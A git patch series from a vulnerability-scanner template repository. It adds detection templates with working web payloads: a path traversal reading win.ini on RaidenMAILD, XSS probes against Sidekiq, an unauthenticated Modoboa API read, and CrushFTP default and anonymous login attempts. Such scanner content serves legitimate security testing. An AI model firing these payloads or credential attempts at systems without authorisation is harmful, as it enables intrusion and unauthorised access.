100644 --- a/profiles/kev.yml +++ b/profiles/kev.yml @@ -1,4 +1,4 @@ -# This is a configuration file for the osint template profile. +# This is a configuration file for the KEV template profile. # Additional configuration profiles can be created for different types of nuclei scans. # They should be placed under the 'config' directory at: # https://github.com/projectdiscovery/nuclei-templates From fc434761074733a2d3bb16f976382b489a1ab083 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 24 Apr 2024 20:39:05 +0530 Subject: [PATCH 0348/1768] Create CVE-2024-32399.yaml --- http/cves/2024/CVE-2024-32399.yaml | 44 ++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2024/CVE-2024-32399.yaml diff --git a/http/cves/2024/CVE-2024-32399.yaml b/http/cves/2024/CVE-2024-32399.yaml new file mode 100644 index 0000000000..f609a5b4cd --- /dev/null +++ b/http/cves/2024/CVE-2024-32399.yaml @@ -0,0 +1,44 @@ +id: CVE-2024-32399 + +info: + name: RaidenMAILD Mail Server v.4.9.4 - Path Traversal + author: DhiyaneshDK + severity: high + description: | + Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component. + reference: + - https://owasp.org/www-community/attacks/Path_Traversal + - https://github.com/NN0b0dy/CVE-2024-32399/blob/main/README.md + - https://github.com/NN0b0dy/c01/blob/main/01.pdf + - https://github.com/NN0b0dy/CVE-2024-32399 + - https://github.com/nomi-sec/PoC-in-GitHub + classification: + epss-score: 0.00043 + epss-percentile: 0.08167 + metadata: + verified: true + max-request: 1 + shodan-query: html:"RaidenMAILD" + tags: cve,cve2024,lfi,raiden,mail,server + +requests: + - method: GET + path: + - "{{BaseURL}}/webeditor/../../../windows/win.ini" + + matchers-condition: and + matchers: + - type: word + words: + - "[fonts]" + - "for 16-bit app support" + part: body + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200 From 152f840958c1ed69192240fd665dcaa5876d071c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 25 Apr 2024 09:38:37 +0530 Subject: [PATCH 0349/1768] updated matche --- network/detection/aix-websm-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/detection/aix-websm-detect.yaml b/network/detection/aix-websm-detect.yaml index 8bdd140648..a9292abd05 100644 --- a/network/detection/aix-websm-detect.yaml +++ b/network/detection/aix-websm-detect.yaml @@ -11,6 +11,7 @@ info: metadata: max-request: 1 verified: true + shodan-query: "/websm/" tags: network,aix,detect tcp: @@ -29,4 +30,4 @@ tcp: words: - "/var/websm/" - "startNewWServer" - - "WServer.HANDSHAKING" + condition: and From def11ec9ee6bd2f614c0c120b06a933c846da53e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 25 Apr 2024 16:12:22 +0530 Subject: [PATCH 0350/1768] Create CVE-2023-2227.yaml --- http/cves/2023/CVE-2023-2227.yaml | 50 +++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 http/cves/2023/CVE-2023-2227.yaml diff --git a/http/cves/2023/CVE-2023-2227.yaml b/http/cves/2023/CVE-2023-2227.yaml new file mode 100644 index 0000000000..9478996811 --- /dev/null +++ b/http/cves/2023/CVE-2023-2227.yaml @@ -0,0 +1,50 @@ +id: CVE-2023-2227 + +info: + name: Modoboa < 2.1.0 - Improper Authorization + author: ritikchaddha,princechaddha + severity: critical + description: | + Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0. + reference: + - https://huntr.com/bounties/351f9055-2008-4af0-b820-01ff66678bf3 + - https://github.com/modoboa/modoboa/commit/7bcd3f6eb264d4e3e01071c97c2bac51cdd6fe97 + - https://nvd.nist.gov/vuln/detail/CVE-2023-2227 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2023-2227 + cwe-id: CWE-285 + cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:* + metadata: + vendor: modoboa + product: modoboa + fofa-query: body="Modoboa" + shodan-query: http.favicon.hash:1949005079 + tags: cve,cve2023,modoboa,exposure,disclosure + +http: + - raw: + - | + GET /api/v2/parameters/core/ HTTP/1.1 + Host: {{Hostname}} + User-Agent: 7h3h4ckv157 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'label":' + - 'default_password":' + - 'authentication_type":"local' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 From bc5bea48fa848c8fdd39ae8764a869a42857892f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 25 Apr 2024 16:12:58 +0530 Subject: [PATCH 0351/1768] Create CVE-2023-1892.yaml --- http/cves/2023/CVE-2023-1892.yaml | 64 +++++++++++++++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 http/cves/2023/CVE-2023-1892.yaml diff --git a/http/cves/2023/CVE-2023-1892.yaml b/http/cves/2023/CVE-2023-1892.yaml new file mode 100644 index 0000000000..e431560e85 --- /dev/null +++ b/http/cves/2023/CVE-2023-1892.yaml @@ -0,0 +1,64 @@ +id: CVE-2023-1892 + +info: + name: Sidekiq < 7.0.8 - Cross-Site Scripting + author: ritikchaddha,princechaddha + severity: high + description: | + An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system. + reference: + - https://huntr.com/bounties/e35e5653-c429-4fb8-94a3-cbc123ae4777 + - https://github.com/sidekiq/sidekiq/commit/458fdf74176a9881478c48dc5cf0269107b22214 + - https://nvd.nist.gov/vuln/detail/CVE-2023-1892 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L + cvss-score: 8.3 + cve-id: CVE-2023-1892 + cwe-id: CWE-79 + cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:* + metadata: + max-request: 4 + vendor: contribsys + product: sidekiq + fofa-query: title="Sidekiq" + tags: cve,cve2023,sidekiq,contribsys,xss + +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}/queues" + + matchers: + - type: word + internal: true + part: body + words: + - "Sidekiq" + - "Dashboard</a>" + condition: and + + - method: GET + path: + - "{{BaseURL}}/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E" + - "{{BaseURL}}/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E" + - "{{BaseURL}}/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<img/src/onerror=alert(document.domain)>" + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 From 0c4a63edfe104f61b12b39ca642542e0f409aefa Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 25 Apr 2024 16:16:33 +0530 Subject: [PATCH 0352/1768] Create monitorr-panel.yaml --- http/exposed-panels/monitorr-panel.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 http/exposed-panels/monitorr-panel.yaml diff --git a/http/exposed-panels/monitorr-panel.yaml b/http/exposed-panels/monitorr-panel.yaml new file mode 100644 index 0000000000..804aa91704 --- /dev/null +++ b/http/exposed-panels/monitorr-panel.yaml @@ -0,0 +1,24 @@ +id: monitorr-panel + +info: + name: Monitorr Panel - Detect + author: ritikchaddha + severity: info + metadata: + verified: true + max-request: 1 + fofa-query: icon_hash="-211006074" + shodan-query: http.favicon.hash:-211006074 + tags: panel,monitorr,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(body, "content=\"Monitorr", "Monitorr is loading", "title=\"Monitorr Settings")' + condition: and From 5511b4e60dbabb339955d1f210677813ae8781b0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 25 Apr 2024 16:42:54 +0530 Subject: [PATCH 0353/1768] updated to dsl --- http/cves/2024/CVE-2024-32399.yaml | 21 ++++++--------------- 1 file changed, 6 insertions(+), 15 deletions(-) diff --git a/http/cves/2024/CVE-2024-32399.yaml b/http/cves/2024/CVE-2024-32399.yaml index f609a5b4cd..acf2f9de60 100644 --- a/http/cves/2024/CVE-2024-32399.yaml +++ b/http/cves/2024/CVE-2024-32399.yaml @@ -26,19 +26,10 @@ requests: path: - "{{BaseURL}}/webeditor/../../../windows/win.ini" - matchers-condition: and matchers: - - type: word - words: - - "[fonts]" - - "for 16-bit app support" - part: body - - - type: word - part: header - words: - - "application/octet-stream" - - - type: status - status: - - 200 + - type: dsl + dsl: + - 'contains_all(body, "[fonts]", "for 16-bit app support")' + - 'contains(header, "application/octet-stream")' + - 'status_code == 200' + condition: and From 367cf84740211bc18da91a9cbe976894d11bbf0e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 25 Apr 2024 16:47:15 +0530 Subject: [PATCH 0354/1768] Update CVE-2024-1183.yaml --- http/cves/2024/CVE-2024-1183.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-1183.yaml b/http/cves/2024/CVE-2024-1183.yaml index 3507b85c1b..8aac080af5 100644 --- a/http/cves/2024/CVE-2024-1183.yaml +++ b/http/cves/2024/CVE-2024-1183.yaml @@ -1,7 +1,7 @@ id: CVE-2024-1183 info: - name: Gradio - Server Side Request Forgery (SSRF) + name: Gradio - Server Side Request Forgery author: DhiyaneshDK severity: medium description: | From bcf88e3159f25dc10ff3b5a328d1b9910b67a1e0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Apr 2024 11:17:30 +0000 Subject: [PATCH 0355/1768] Auto Generated New Template Addition List [Thu Apr 25 11:17:30 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 8224af0bc3..ecd43082e4 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ http/cves/2023/CVE-2023-2949.yaml http/cves/2023/CVE-2023-31446.yaml http/cves/2023/CVE-2023-4973.yaml http/cves/2024/CVE-2024-31621.yaml +http/cves/2024/CVE-2024-32399.yaml http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml http/exposed-panels/bonobo-server-panel.yaml http/exposed-panels/cassia-bluetooth-gateway-panel.yaml From fe4f25b8add6dbef096449d793a721287ca52eef Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Apr 2024 11:17:35 +0000 Subject: [PATCH 0356/1768] Auto Generated Templates Checksum [Thu Apr 25 11:17:35 UTC 2024] :robot: --- templates-checksum.txt | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9ff6358a5b..3622a76f56 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3107,7 +3107,7 @@ http/cves/2023/CVE-2023-39109.yaml:fa658d913fd94a0c2aa9371b3a48232f299057e0 http/cves/2023/CVE-2023-39110.yaml:438e5a17629cb1800f6c53b4313a9e93c97248ea http/cves/2023/CVE-2023-39120.yaml:fe50f8e80ac67803942ed0b7fd0204e8f1fadbfc http/cves/2023/CVE-2023-39141.yaml:bc88d2b87ea3588e113375c468f3110966db9e99 -http/cves/2023/CVE-2023-39143.yaml:00e7970025674a084cac8754fbcac9cfce3c8ef3 +http/cves/2023/CVE-2023-39143.yaml:54033c211aa0242597737d53de3b07a9bb548363 http/cves/2023/CVE-2023-3936.yaml:7b2e238b1483242fedc77cd468f0c60f05b5ecbb http/cves/2023/CVE-2023-39361.yaml:f28752fc93eaf34fa6ee0d92fd8b41279a894b3f http/cves/2023/CVE-2023-39598.yaml:40946b09a3f8dde729d593ed391d6e45799e8a42 @@ -3248,7 +3248,8 @@ http/cves/2024/CVE-2024-28734.yaml:a21288b4f390a5aea56ed3660da93b8fed589096 http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc -http/cves/2024/CVE-2024-31621.yaml:debfdc08e3b9d9a5e9dbf495147dfe7624f2f164 +http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 +http/cves/2024/CVE-2024-32399.yaml:6dce2f1a1371d573691ea9bf419aeb954003ee81 http/cves/2024/CVE-2024-3273.yaml:ba09cef76e7e1002ae6d72d3d9b670f09562ca9b http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 @@ -8410,6 +8411,7 @@ profiles/aws-cloud-config.yml:35d9feaf76e79bf9b83a33f0f95803a8cc97a9cc profiles/bugbounty.yml:05aaced1241dba5b3c3b37559269b1cae473f52f profiles/cloud.yml:454e596d8ca3f19213b148f6c54c20806cb87a8e profiles/compliance.yml:367b57e7e900f92bc8d9e5883e635e975da0cae9 +profiles/kev.yml:4317bb80617dbbfa0921e3f2164eec962b9d6517 profiles/osint.yml:683fe1e52716d054760d707dbc123f5e09de5418 profiles/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196 profiles/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8 @@ -8443,7 +8445,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1b24ff91e51c4702ead52f0da5c97da18e4e41bc +templates-checksum.txt:a8cf75aee0b6983bac40a13b91fef7196ac46814 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 090815c3590c09d963d460aef05cdfb3fc4f0916 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Apr 2024 11:17:39 +0000 Subject: [PATCH 0357/1768] Auto Generated cves.json [Thu Apr 25 11:17:39 UTC 2024] :robot: --- cves.json | 2 ++ cves.json-checksum.txt | 2 +- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index ef44383c58..198e58c831 100644 --- a/cves.json +++ b/cves.json @@ -2354,6 +2354,8 @@ {"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"critical","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"} {"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"} {"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"} +{"ID":"CVE-2024-31621","Info":{"Name":"Flowise 1.6.5 - Authentication Bypass","Severity":"high","Description":"The flowise version \u003c= 1.6.5 is vulnerable to authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31621.yaml"} +{"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"} {"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"high","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 4312f16a7c..6a5892da11 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -68cd88caf661d15462a3281cef4bfe7a +a601931b82eff7c0eb13a1a141ecdbcd From 2fdb41d24969af375ca61ee3e415ef87e73ea756 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Apr 2024 11:18:17 +0000 Subject: [PATCH 0358/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9b06568a60..f77afb3aa6 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,7 @@ on: - 'http/cves/2023/CVE-2023-31446.yaml' - 'http/cves/2023/CVE-2023-4973.yaml' - 'http/cves/2024/CVE-2024-31621.yaml' + - 'http/cves/2024/CVE-2024-32399.yaml' - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' - 'http/exposed-panels/bonobo-server-panel.yaml' - 'http/exposed-panels/cassia-bluetooth-gateway-panel.yaml' From 919cccfb62c220ea5cbd8560542c9300a9d2ca0d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 25 Apr 2024 16:49:08 +0530 Subject: [PATCH 0359/1768] updated id --- network/detection/bluecoat-telnet-proxy-detect.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/network/detection/bluecoat-telnet-proxy-detect.yaml b/network/detection/bluecoat-telnet-proxy-detect.yaml index a604a26946..3e1128b63f 100644 --- a/network/detection/bluecoat-telnet-proxy-detect.yaml +++ b/network/detection/bluecoat-telnet-proxy-detect.yaml @@ -1,7 +1,7 @@ -id: bluecoat-telnet-proxy +id: bluecoat-telnet-proxy-detect info: - name: Blue Coat telnet proxy - Detect + name: BlueCoat Telnet Proxy - Detect author: righettod severity: info description: Detects Blue Coat telnet proxy services. @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: network,bluecoat,detect + tags: network,bluecoat,proxy,detect tcp: - inputs: @@ -28,4 +28,4 @@ tcp: - type: word part: data words: - - "Blue Coat telnet proxy" \ No newline at end of file + - "Blue Coat telnet proxy" From f27fb17b90ae6a706c89cdf9fd003fee326c4e07 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Apr 2024 11:19:16 +0000 Subject: [PATCH 0360/1768] Auto Template Signing [Thu Apr 25 11:19:16 UTC 2024] :robot: --- http/cves/2024/CVE-2024-32399.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-32399.yaml b/http/cves/2024/CVE-2024-32399.yaml index acf2f9de60..76689ee791 100644 --- a/http/cves/2024/CVE-2024-32399.yaml +++ b/http/cves/2024/CVE-2024-32399.yaml @@ -33,3 +33,4 @@ requests: - 'contains(header, "application/octet-stream")' - 'status_code == 200' condition: and +# digest: 4a0a00473045022100b21edb32b4116b053ec5df064a8c2211cf7a2b9e6293731a8d9f4be377924cef0220379f8f6282665245242f29e33af2608658f85a062be362c3d0ba849564b85059:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f8333c47ad091f735c5a6ba0d725223415c6f05d Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Apr 2024 11:20:15 +0000 Subject: [PATCH 0361/1768] Auto Generated New Template Addition List [Thu Apr 25 11:20:15 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ecd43082e4..bae4b23a6f 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ http/cves/2023/CVE-2023-2948.yaml http/cves/2023/CVE-2023-2949.yaml http/cves/2023/CVE-2023-31446.yaml http/cves/2023/CVE-2023-4973.yaml +http/cves/2024/CVE-2024-1183.yaml http/cves/2024/CVE-2024-31621.yaml http/cves/2024/CVE-2024-32399.yaml http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml From ec1fb614c41613a620d9ce9727acc41201117b23 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Apr 2024 11:21:00 +0000 Subject: [PATCH 0362/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f77afb3aa6..9b9f883d9e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2023/CVE-2023-2949.yaml' - 'http/cves/2023/CVE-2023-31446.yaml' - 'http/cves/2023/CVE-2023-4973.yaml' + - 'http/cves/2024/CVE-2024-1183.yaml' - 'http/cves/2024/CVE-2024-31621.yaml' - 'http/cves/2024/CVE-2024-32399.yaml' - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' From 5b24acc772cd79abe1c1b7f4cd9200822ec81304 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Apr 2024 11:22:04 +0000 Subject: [PATCH 0363/1768] Auto Template Signing [Thu Apr 25 11:22:04 UTC 2024] :robot: --- http/cves/2024/CVE-2024-1183.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-1183.yaml b/http/cves/2024/CVE-2024-1183.yaml index 8aac080af5..06f1156ff3 100644 --- a/http/cves/2024/CVE-2024-1183.yaml +++ b/http/cves/2024/CVE-2024-1183.yaml @@ -33,3 +33,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' part: header +# digest: 4a0a004730450221008fa9c24b03fedb13e37837ad2730bc20d6d973ad45a2d74dd82193fb651172c5022057ad36fe5c2c8f0f555f7106c808470d5cfc40e96a168c822c4cc96f1183df15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9e574cf8bee120d9eddf5cf3ecdf15d99ebd28b7 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 25 Apr 2024 16:53:04 +0530 Subject: [PATCH 0364/1768] CrushFTP Default Login --- .../crushftp-default-login.yaml | 58 +++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 http/default-logins/crushftp-default-login.yaml diff --git a/http/default-logins/crushftp-default-login.yaml b/http/default-logins/crushftp-default-login.yaml new file mode 100644 index 0000000000..354b6ad23c --- /dev/null +++ b/http/default-logins/crushftp-default-login.yaml @@ -0,0 +1,58 @@ +id: crushftp-default-login + +info: + name: CrushFTP - Default Login + author: pussycat0x + severity: high + description: | + CrushFTP default login credentials were discovered. + metadata: + shodan-query: html:"CrushFTP" + verified: true + max-request: 2 + tags: default-login,crushftp + +http: + - raw: + - | + GET /WebInterface/ HTTP/1.1 + Host: {{Hostname}} + + + - | + POST /WebInterface/function/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: http://{{RootURL}}/WebInterface/login.html + + command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926 + + + attack: pitchfork + payloads: + username: + - crushadmin + password: + - crushadmin + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "<response>success</response>" + + - type: word + part: header_2 + words: + - "text/xml" + + extractors: + - type: regex + name: auth + internal: true + part: header_2 + group: 1 + regex: + - 'currentAuth=([0-9a-zA-Z]+)' From 4daf6bb4a41b005a9d2ed14210bc1cd8db7089ad Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 25 Apr 2024 16:58:30 +0530 Subject: [PATCH 0365/1768] minor update --- http/default-logins/crushftp-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/default-logins/crushftp-default-login.yaml b/http/default-logins/crushftp-default-login.yaml index 354b6ad23c..8ff9b87fcf 100644 --- a/http/default-logins/crushftp-default-login.yaml +++ b/http/default-logins/crushftp-default-login.yaml @@ -23,7 +23,7 @@ http: POST /WebInterface/function/ HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} - Referer: http://{{RootURL}}/WebInterface/login.html + Referer: {{RootURL}}/WebInterface/login.html command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926 From 7aeb3f7e7b5b10b69bc586080f6f5fa5d0914a21 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 25 Apr 2024 17:12:30 +0530 Subject: [PATCH 0366/1768] Create crushftp-anonymous-login.yaml --- .../crushftp-anonymous-login.yaml | 49 +++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 http/default-logins/crushftp-anonymous-login.yaml diff --git a/http/default-logins/crushftp-anonymous-login.yaml b/http/default-logins/crushftp-anonymous-login.yaml new file mode 100644 index 0000000000..8d437659b5 --- /dev/null +++ b/http/default-logins/crushftp-anonymous-login.yaml @@ -0,0 +1,49 @@ +id: crushftp-anonymous-login + +info: + name: CrushFTP - Anonymous Login + author: pussycat0x + severity: high + description: | + CrushFTP Anonymous login credentials were discovered. + metadata: + shodan-query: html:"CrushFTP" + verified: true + max-request: 2 + tags: misconfig,anonymous,crushftp + +http: + - raw: + - | + GET /WebInterface/ HTTP/1.1 + Host: {{Hostname}} + + + - | + POST /WebInterface/function/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + command=getUsername&random=0.4186510822713485&c2f={{auth}} + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "<username>anonymous</username>" + + - type: word + part: header_2 + words: + - "text/xml" + + + extractors: + - type: regex + name: auth + internal: true + part: header_1 + group: 1 + regex: + - 'currentAuth=([0-9a-zA-Z]+)' From 6fab027f0da8285f668fd4caaba6f1761d560af5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Apr 2024 11:55:57 +0000 Subject: [PATCH 0367/1768] Auto Generated New Template Addition List [Thu Apr 25 11:55:57 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index bae4b23a6f..e134fb58ef 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cves/2023/CVE-2023-1892.yaml http/cves/2023/CVE-2023-2948.yaml http/cves/2023/CVE-2023-2949.yaml http/cves/2023/CVE-2023-31446.yaml From bfcbab7896578620a7e79368e6526f94d2b5e947 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Apr 2024 11:56:06 +0000 Subject: [PATCH 0368/1768] Auto Generated Templates Checksum [Thu Apr 25 11:56:06 UTC 2024] :robot: --- templates-checksum.txt | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3622a76f56..dd338b7b03 100644 --- a/templates-checksum.txt +++ 